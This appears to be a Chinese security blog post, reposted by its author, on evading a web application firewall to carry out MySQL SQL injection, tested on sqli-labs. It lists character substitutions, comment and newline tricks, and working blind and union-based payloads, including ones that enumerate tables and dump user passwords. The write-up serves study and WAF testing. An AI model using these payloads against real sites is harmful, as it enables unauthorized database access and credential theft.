0x00 前言

注:转自安全客(作者也是我)

  无论是在CTF比赛中还是在现实项目中,都会遇到各种各样的waf,没有绝对安全的系统,仔细的研究总会发现被“漏掉”的地方。   最近在研究过waf的技巧,期间还是很有趣的,在这里与大家分享一下,仅个人见解,哪里写的不好欢迎各位师傅斧正!本文只研究MySQL数据库,其余有机会在分享。

环境

sqli-labs 某常见最新版免费防护软件(仅作研究用) windows2008+phpstudy

0x01 等价字符

空格:%20,+,(),%0a,%09,%a0,%0b,%0c,%0d,/**/等 =:like,regexp,liker,<>,!=等 (一般ctf中常见) and:&& or: xor,&,^,||(and或or可以相互替换,只是两边条件不同) 逗号:盲注中 from 1 for 1,联合查询中 A join B。 关于替换字符自行fuzz尝试,方法还有很多。

0x02 MySQL的特性

有必要了解一些MySQL的特性,这样有助于绕过waf的规则。

=,:=,@

MySQL中“=”为等于的意思,只有在update set时为赋值的意思。 “:=”为赋值的意思。 在MySQL中变量不需要定义,利用@+变量名可直接调用。

注释符

在MySQL中可以使用的注释符有: /**/ 可用于多行注释。 --(我是空格),#。 但是在MySQL中有一个独有的特性就是注释符中叹号后面的内容仍可以解析,比如/*!and*/,并且叹号后面的数字小于或等于MySQL版本号的话同样会解析。

换行

在MySQL中换行后内容会继续执行

MySQL的隐式类型转换

先看两个示例,应该就很容易明白了。 你懂我意思吧:)

绕waf的一些想法

前面的铺垫做完了,接下来实现一些想法。

判断注入点

经测试:

1
2
3
4
and //不拦截
and a //不拦截
and !//不拦截
and 1 //拦截

可以发现,当and连接数字时waf会进行拦截,因此只需要在数字或者and与数字中间进行干扰即可。

1
2
3
and /*!1=1*/
and--+a%0a1/*!=*/1
and @s1ye:=1/0

注入点确定后,分别测试一下盲注与联合查询注入。

盲注

利用MySQL变量进行盲注

在圈子看到一篇盲注的payload总结,感觉还是有些麻烦了。可以利用@x:=来构造一个简单的payload: and @s1ye:=length(database/**/())

其他payload可以利用 注释符–+加任意干扰字符加换行符%0a来进行绕过。主要的思路就是利用参数污染来干扰waf的规则。

利用MySQL的隐式类型转换进行盲注

简单说一下:

1
2
select * from test where id = '1'-(length(database())>0)+'1';
即 id= 1-1+1

联合查询注入

1
2
3
union //不拦截
select //不拦截
union select //拦截

当waf拦截了哪种组合,利用注释加换行即可,效果如下所示,发现可以正常执行。

1
2
payload:
-1' union--+x%0aselect 1,2,3--+

接下来读取数据库数据

1
-1' union--+x%0aselect 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

发现被拦截,fuzz发现waf会过滤掉函数,以及group_concat(table_name) from,这里去掉from前的空格,database()=>database () 或 database/**/()。 这里也可以利用database()的0x16进制。 读取用户名密码

1
union--x%0aselect 1,2,group_concat(password)from users

/*/配合注释符/**/有奇效,可自行测试。 以下为整理的waf中可用的系统变量及函数:

1
2
3
4
@@version/**/
user/**/()
database/**/()
/**/@@version_compile_os

系统变量的注释符放在前后都可。

总结

对于绕waf,我的理解为,多了解一些数据库的特性,一些不常见小的技巧、函数等,分析waf的规则,在MySQL命令行中fuzz即可,waf规则总有漏网之鱼。 最后,文章只是记录自己学习的过程,有些payload不是很完善,仅仅是一些想法分享。